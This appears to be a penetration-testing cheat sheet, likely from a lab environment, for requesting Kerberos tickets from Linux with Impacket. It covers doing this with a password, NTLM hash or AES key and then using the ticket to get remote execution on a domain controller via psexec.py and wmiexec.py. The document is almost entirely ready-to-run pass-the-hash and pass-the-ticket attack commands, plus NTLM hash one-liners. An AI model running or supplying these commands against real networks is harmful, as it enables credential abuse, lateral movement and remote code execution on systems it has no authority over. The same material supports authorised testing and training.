When we have a password, NTLM hash, or AES key, we can request a TGT directly from Linux and save it as ccache. This is the common remote Kerberos workflow with Impacket.
Password to ccache:
getTGT.py ootw.local/student:'student' -dc-ip 10.10.10.200
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist
NTLM hash to ccache:
getTGT.py -hashes :64fbae31cc352fc26af97cbdef151e03 ootw.local/student -dc-ip 10.10.10.200
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist
LM:NTLM format:
getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:edf3fec5cfe3db436b4f1d92e70eda3f ootw.local/student -dc-ip 10.10.10.200
AES key to ccache:
getTGT.py -aesKey 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef ootw.local/student -dc-ip 10.10.10.200
Use the ticket with Impacket:
psexec.py -k -no-pass ootw.local/student@dc01.ootw.local -dc-ip 10.10.10.200
wmiexec.py -k -no-pass ootw.local/student@dc01.ootw.local -dc-ip 10.10.10.200
smbclient.py -k -no-pass ootw.local/student@dc01.ootw.local -dc-ip 10.10.10.200
Validate with NetExec:
nxc smb 10.10.10.200 -d ootw.local -u student -k --use-kcache
nxc ldap 10.10.10.200 -d ootw.local -u student -k --use-kcache
Password to NTLM:
iconv -f ASCII -t UTF-16LE <(printf 'CLEAR_TEXT_PASSWD') | openssl dgst -md4
Python NTLM with Impacket:
python3 -c "from impacket.ntlm import compute_nthash; print(compute_nthash('CLEAR_TEXT_PASSWD').hex())"